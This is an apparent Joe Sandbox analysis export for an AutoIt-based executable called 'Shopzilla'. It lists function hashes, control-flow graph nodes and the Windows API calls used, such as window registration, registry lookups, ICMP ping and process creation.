                                              • Opcode ID: 51fccc27ed599a0a32ba3a006b34dac8ee8956013781a4d80acf81c67ff81ca0
                                              • Instruction ID: 5bbcc397743afc45820eb265d6002cbb943386c8c0be041a95fbfb8cff52297f
                                              • Opcode Fuzzy Hash: 51fccc27ed599a0a32ba3a006b34dac8ee8956013781a4d80acf81c67ff81ca0
                                              • Instruction Fuzzy Hash: 7F31C2B10083019FD304EF54C895BBFBBE8EF95344F50092DF681961E1EBB19A49CB92
                                              APIs
                                                • Part of subcall function 00BB3740: CharUpperBuffW.USER32(?,00C661DC,00000000,?,00000000,00C661DC,?,00BA53A5,?,?,?,?), ref: 00BB375D
                                              • _memmove.LIBCMT ref: 00BAB68A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_memmove
                                              • String ID:
                                              • API String ID: 2819905725-0
                                              • Opcode ID: fbe4c6ce229efcc3c94d09bedcf8db0e39f8ee8f595ea9f1610ec9ff98070384
                                              • Instruction ID: 4e749adcf4ea7a0f4ef26940c434355361fe4d266c3a4cf75b00c0f9ce5ed099
                                              • Opcode Fuzzy Hash: fbe4c6ce229efcc3c94d09bedcf8db0e39f8ee8f595ea9f1610ec9ff98070384
                                              • Instruction Fuzzy Hash: 1BA259706083419FD720DF15C484B2AB7E1FF8A704F1489ADE8AA9B352D771ED85CB92
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00BEFC06), ref: 00C047C7
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00C047D8
                                              • FindClose.KERNEL32(00000000), ref: 00C047E8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: f0dd332eb02444a775e22088ef14c4990018c18c0e6b3b9ea6afcbafc7f930be
                                              • Instruction ID: 71e407383aa1055ae87249eec46a1e0d47b0ae3df26815d5bc1acbb8dbb93400
                                              • Opcode Fuzzy Hash: f0dd332eb02444a775e22088ef14c4990018c18c0e6b3b9ea6afcbafc7f930be
                                              • Instruction Fuzzy Hash: 62E0DF72820621AB8214673CEC4D9EF375C9E06339F200B55FA31C21E0EBB09E40C696
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b492c20b657b251941f36eaad70b06e5cf438c4e2d3bcf51d2f9f7f019dfa1f
                                              • Instruction ID: 76fd33790afd4d328c948cb99a144af34e460c0ba8c375163683e48557569b66
                                              • Opcode Fuzzy Hash: 9b492c20b657b251941f36eaad70b06e5cf438c4e2d3bcf51d2f9f7f019dfa1f
                                              • Instruction Fuzzy Hash: 1E22AF70D08215DFDB24DF58C490AAEB7F0FF5A300F1481A9E856AB351E774AD81EB91
                                              APIs
                                              • timeGetTime.WINMM ref: 00BABF57
                                                • Part of subcall function 00BA52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA52E6
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00BE35E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessagePeekSleepTimetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                              • API String ID: 1792118007-922114024
                                              • Opcode ID: 29ca71f3882637d400e0290064d85616e7dd0c001f8ca128e26f4f0554a56aaf
                                              • Instruction ID: 1bdd31273b71225bcde405b8708af3b4297dc47ae29d3b5a4a86d2040dff33c1
                                              • Opcode Fuzzy Hash: 29ca71f3882637d400e0290064d85616e7dd0c001f8ca128e26f4f0554a56aaf
                                              • Instruction Fuzzy Hash: 78C2BE706083819FC724DF25C894BAEBBE0FF85704F14499DF59A972A2DB71E944CB82

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BA3444
                                              • RegisterClassExW.USER32(00000030), ref: 00BA346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00BA349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA34AC
                                              • LoadIconW.USER32(000000A9), ref: 00BA34C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA34D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: d977f0f92d2e2ca31b0fcd89bdd030c3cbf44fc01d2479cb410a70bfcb0b0590
                                              • Instruction ID: cee09f8c94c9a096287e89a189fa48a1bcb87c31ec349029ff489e2aa9c14f7f
                                              • Opcode Fuzzy Hash: d977f0f92d2e2ca31b0fcd89bdd030c3cbf44fc01d2479cb410a70bfcb0b0590
                                              • Instruction Fuzzy Hash: 263125B2850309EFDB50DFA4E899BCDBBF4FB09320F20451AE590E62A0D7B51981CF91

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BA3444
                                              • RegisterClassExW.USER32(00000030), ref: 00BA346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00BA349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA34AC
                                              • LoadIconW.USER32(000000A9), ref: 00BA34C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA34D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 318a929a47fcb5884d04710dc4d1208298a417b9e0b57f6af56833eb27c5ae8c
                                              • Instruction ID: eb630d2149586902f2ee31f8d0a88910ef4fdc70c4759a8d0a9e1319a1824484
                                              • Opcode Fuzzy Hash: 318a929a47fcb5884d04710dc4d1208298a417b9e0b57f6af56833eb27c5ae8c
                                              • Instruction Fuzzy Hash: 5021C3B2910318AFDB509FA5E899B9DBBF4FB08710F10411AF550A72A0D7B155448F95

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00BBFFFA: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00BB3094), ref: 00BC0018
                                                • Part of subcall function 00BC07EC: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BB309F), ref: 00BC080E
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BB30E2
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BF013A
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BF017B
                                              • RegCloseKey.ADVAPI32(?), ref: 00BF01B9
                                              • _wcscat.LIBCMT ref: 00BF0212
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: 514b9cc74a8de16fd876d51f4026c4008c5c40c54f63370f8d6ae9495930bd9b
                                              • Instruction ID: dd69665cdab845646e444cc12d9441901ce00749590362d057938bae4169bc2b
                                              • Opcode Fuzzy Hash: 514b9cc74a8de16fd876d51f4026c4008c5c40c54f63370f8d6ae9495930bd9b
                                              • Instruction Fuzzy Hash: 50717E71419305DEC724EF2AECA1AAFBBE8FF54744F400A6EF44583161DBB09948CB51

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BB5156
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB5165
                                              • LoadIconW.USER32(00000063), ref: 00BB517C
                                              • LoadIconW.USER32(000000A4), ref: 00BB518E
                                              • LoadIconW.USER32(000000A2), ref: 00BB51A0
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BB51C6
                                              • RegisterClassExW.USER32(?), ref: 00BB521C
                                                • Part of subcall function 00BA3411: GetSysColorBrush.USER32(0000000F), ref: 00BA3444
                                                • Part of subcall function 00BA3411: RegisterClassExW.USER32(00000030), ref: 00BA346E
                                                • Part of subcall function 00BA3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA347F
                                                • Part of subcall function 00BA3411: InitCommonControlsEx.COMCTL32(?), ref: 00BA349C
                                                • Part of subcall function 00BA3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA34AC
                                                • Part of subcall function 00BA3411: LoadIconW.USER32(000000A9), ref: 00BA34C2
                                                • Part of subcall function 00BA3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA34D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: a75b57971e032f7f20d1f24f1e2627235088104cd43235a41e7d77f36c13f1db
                                              • Instruction ID: 17727f45e43976e94b08eb44c62613597369eb5477e164bbeeac43dba1bb13d3
                                              • Opcode Fuzzy Hash: a75b57971e032f7f20d1f24f1e2627235088104cd43235a41e7d77f36c13f1db
                                              • Instruction Fuzzy Hash: 54214B71D10308AFEB209FA6EC29B9DBFF4FB08714F10016AE504A62A0D7F655548F84

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 713 c15be2-c15c19 call ba4dc0 716 c15c39-c15c4b WSAStartup 713->716 717 c15c1b-c15c28 call ba502b 713->717 718 c15c62-c15ca0 call bb40cd call ba4d37 call bb402a inet_addr gethostbyname 716->718 719 c15c4d-c15c5d call bf6f18 716->719 717->716 724 c15c2a-c15c35 call ba502b 717->724 734 c15cb1-c15cc1 call bf6f18 718->734 735 c15ca2-c15caf IcmpCreateFile 718->735 728 c15dbb-c15dc3 719->728 724->716 740 c15db2-c15db6 call bb1cb6 734->740 735->734 736 c15cc6-c15cf7 call bc0f16 call bb433f 735->736 745 c15cf9-c15d18 IcmpSendEcho 736->745 746 c15d1a-c15d2e IcmpSendEcho 736->746 740->728 747 c15d32-c15d34 745->747 746->747 748 c15d67-c15d69 747->748 749 c15d36-c15d3b 747->749 750 c15d6b-c15d77 call bf6f18 748->750 751 c15d3d-c15d42 749->751 752 c15d7f-c15d91 call ba4dc0 749->752 760 c15d99-c15dad IcmpCloseHandle WSACleanup call bb45ae 750->760 755 c15d44-c15d49 751->755 756 c15d79-c15d7d 751->756 761 c15d93-c15d95 752->761 762 c15d97 752->762 755->748 759 c15d4b-c15d50 755->759 756->750 763 c15d52-c15d57 759->763 764 c15d5f-c15d65 759->764 760->740 761->760 762->760 763->756 765 c15d59-c15d5d 763->765 764->750 765->750
                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 00C15C43
                                              • inet_addr.WSOCK32(?,?,?), ref: 00C15C88
                                              • gethostbyname.WS2_32(?), ref: 00C15C94
                                              • IcmpCreateFile.IPHLPAPI ref: 00C15CA2
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C15D12
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C15D28
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C15D9D
                                              • WSACleanup.WSOCK32 ref: 00C15DA3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: dc0d30954db45894d5fac98a9a40523678ad826fbe8e0b6f535c70fb58b59e9d
                                              • Instruction ID: e47c93c24d55e733fc7cdcecd49f48946164ec28bf9acdc7ff14a0b01de9955d
                                              • Opcode Fuzzy Hash: dc0d30954db45894d5fac98a9a40523678ad826fbe8e0b6f535c70fb58b59e9d
                                              • Instruction Fuzzy Hash: 4A51AC31604700DFD720EF24DD49BAA77E0EB8A710F148969F9659B2A1DB70ED819B41

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 767 bb4d83-bb4dd1 769 bb4dd3-bb4dd6 767->769 770 bb4e31-bb4e33 767->770 771 bb4dd8-bb4ddf 769->771 772 bb4e37 769->772 770->769 773 bb4e35 770->773 774 bb4ead-bb4eb5 PostQuitMessage 771->774 775 bb4de5-bb4dea 771->775 777 bb4e3d-bb4e40 772->777 778 bf0942-bf0970 call bac460 call bac483 772->778 776 bb4e1a-bb4e22 DefWindowProcW 773->776 783 bb4e61-bb4e63 774->783 779 bf09b5-bf09c9 call c02b3a 775->779 780 bb4df0-bb4df2 775->780 782 bb4e28-bb4e2e 776->782 784 bb4e42-bb4e43 777->784 785 bb4e65-bb4e8c SetTimer RegisterWindowMessageW 777->785 813 bf0975-bf097c 778->813 779->783 805 bf09cf 779->805 786 bb4df8-bb4dfd 780->786 787 bb4eb7-bb4ec1 call bb5b29 780->787 783->782 791 bb4e49-bb4e5c KillTimer call bb5ac3 call ba34e4 784->791 792 bf08e5-bf08e8 784->792 785->783 788 bb4e8e-bb4e99 CreatePopupMenu 785->788 793 bf099a-bf09a1 786->793 794 bb4e03-bb4e08 786->794 807 bb4ec6 787->807 788->783 791->783 798 bf091e-bf093d MoveWindow 792->798 799 bf08ea-bf08ec 792->799 793->776 802 bf09a7-bf09b0 call bf8637 793->802 803 bb4e9b-bb4eab call bb5bd7 794->803 804 bb4e0e-bb4e14 794->804 798->783 808 bf08ee-bf08f1 799->808 809 bf090d-bf0919 SetFocus 799->809 802->776 803->783 804->776 804->813 805->776 807->783 808->804 814 bf08f7-bf0908 call bac460 808->814 809->783 813->776 818 bf0982-bf0995 call bb5ac3 call bb59d3 813->818 814->783 818->776
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00BB4E22
                                              • KillTimer.USER32(?,00000001), ref: 00BB4E4C
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BB4E6F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB4E7A
                                              • CreatePopupMenu.USER32 ref: 00BB4E8E
                                              • PostQuitMessage.USER32(00000000), ref: 00BB4EAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: 3b44401b127ef9e9a4d537a78c64fab90e21d21f7653042b9bf9caa695e69539
                                              • Instruction ID: 4efb6b359c54e1fd18822da214736988116fe3255a40db174b0976a3128e3d9a
                                              • Opcode Fuzzy Hash: 3b44401b127ef9e9a4d537a78c64fab90e21d21f7653042b9bf9caa695e69539
                                              • Instruction Fuzzy Hash: 7C41A071214209ABDF296F28DC99BFE7AD5FB45300F1402A9F502922A3DBF0EC5497A1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 908 c1fb45-c1fba6 call bc2f40 911 c1fbd2-c1fbd6 908->911 912 c1fba8-c1fbbb call ba502b 908->912 914 c1fbd8-c1fbe8 call ba502b 911->914 915 c1fc1d-c1fc23 911->915 920 c1fc08 912->920 921 c1fbbd-c1fbd0 call ba502b 912->921 930 c1fbeb-c1fc04 call ba502b 914->930 917 c1fc25-c1fc28 915->917 918 c1fc38-c1fc3e 915->918 922 c1fc2b-c1fc30 call ba502b 917->922 923 c1fc40 918->923 924 c1fc48-c1fc62 call ba4d37 call bb436a 918->924 926 c1fc0b-c1fc0f 920->926 921->930 922->918 923->924 941 c1fd21-c1fd29 924->941 942 c1fc68-c1fcc1 call ba4d37 call bb436a call ba4d37 call bb436a call ba4d37 call bb436a 924->942 931 c1fc11-c1fc17 926->931 932 c1fc19-c1fc1b 926->932 930->915 940 c1fc06 930->940 931->922 932->915 932->918 940->926 944 c1fd53-c1fd81 GetCurrentDirectoryW call bc0f16 GetCurrentDirectoryW 941->944 945 c1fd2b-c1fd46 call ba4d37 call bb436a 941->945 990 c1fcc3-c1fcde call ba4d37 call bb436a 942->990 991 c1fcef-c1fd1f GetSystemDirectoryW call bc0f16 GetSystemDirectoryW 942->991 953 c1fd85 944->953 945->944 961 c1fd48-c1fd51 call bc2d5c 945->961 956 c1fd89-c1fd8d 953->956 959 c1fd8f-c1fdb9 call ba4f98 * 3 956->959 960 c1fdbe-c1fdce call c06e02 956->960 959->960 972 c1fdd0-c1fe1b call c074bf call c073ce call c07447 960->972 973 c1fe2a 960->973 961->944 961->960 974 c1fe2c-c1fe30 972->974 1005 c1fe1d-c1fe28 972->1005 973->974 979 c1fe36-c1fe61 call bf8cd6 974->979 980 c1fedc-c1ff03 CreateProcessW 974->980 995 c1fe63-c1fe68 call bf8d11 979->995 996 c1fe6a call bf8fb2 979->996 984 c1ff06-c1ff19 call bc0f8c * 2 980->984 1011 c1ff58-c1ff64 CloseHandle 984->1011 1012 c1ff1b-c1ff53 call bf6f18 GetLastError call bbfcd9 call ba4dc0 984->1012 990->991 1013 c1fce0-c1fce9 call bc2d5c 990->1013 991->953 1004 c1fe6f-c1fe81 call bc2d5c 995->1004 996->1004 1020 c1fe83-c1fe88 1004->1020 1021 c1fe8a-c1fe9a call bc2d5c 1004->1021 1005->974 1014 c1ff90-c1ff94 1011->1014 1015 c1ff66-c1ff8b call c07072 call c076ba call c20027 1011->1015 1028 c1ffd9-c1ffea call c06e9c 1012->1028 1013->956 1013->991 1022 c1ffa2-c1ffac 1014->1022 1023 c1ff96-c1ffa0 1014->1023 1015->1014 1020->1020 1020->1021 1039 c1fea3-c1feb3 call bc2d5c 1021->1039 1040 c1fe9c-c1fea1 1021->1040 1029 c1ffb4-c1ffd3 call ba4dc0 CloseHandle 1022->1029 1030 c1ffae 1022->1030 1023->1028 1029->1028 1030->1029 1047 c1feb5-c1feba 1039->1047 1048 c1febc-c1feda call bc0f8c * 3 1039->1048 1040->1039 1040->1040 1047->1047 1047->1048 1048->984
                                              APIs
                                              • _memset.LIBCMT ref: 00C1FB66
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C1FCF9
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C1FD1D
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C1FD5D
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C1FD7F
                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C1FEFB
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C1FF2D
                                              • CloseHandle.KERNEL32(?), ref: 00C1FF5C
                                              • CloseHandle.KERNEL32(?), ref: 00C1FFD3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: 4bb18fb6b7f846874fc66fe6a7d92e2c6743fe3730021b46b57ed3d546ee28b4
                                              • Instruction ID: 7b104760000e9801bfc9c3d677b3194405dfc5346bcf89ed1976a3a61e7041e1
                                              • Opcode Fuzzy Hash: 4bb18fb6b7f846874fc66fe6a7d92e2c6743fe3730021b46b57ed3d546ee28b4
                                              • Instruction Fuzzy Hash: B0E19331508305DFC724EF24C491BAEBBE1AF86310F14856DF8959B2A2CB71DD86DB52

                                              Control-flow Graph

                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BF0BDB
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              • _memset.LIBCMT ref: 00BB5787
                                              • _wcscpy.LIBCMT ref: 00BB57DB
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BB57EB
                                              • __swprintf.LIBCMT ref: 00BF0C51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
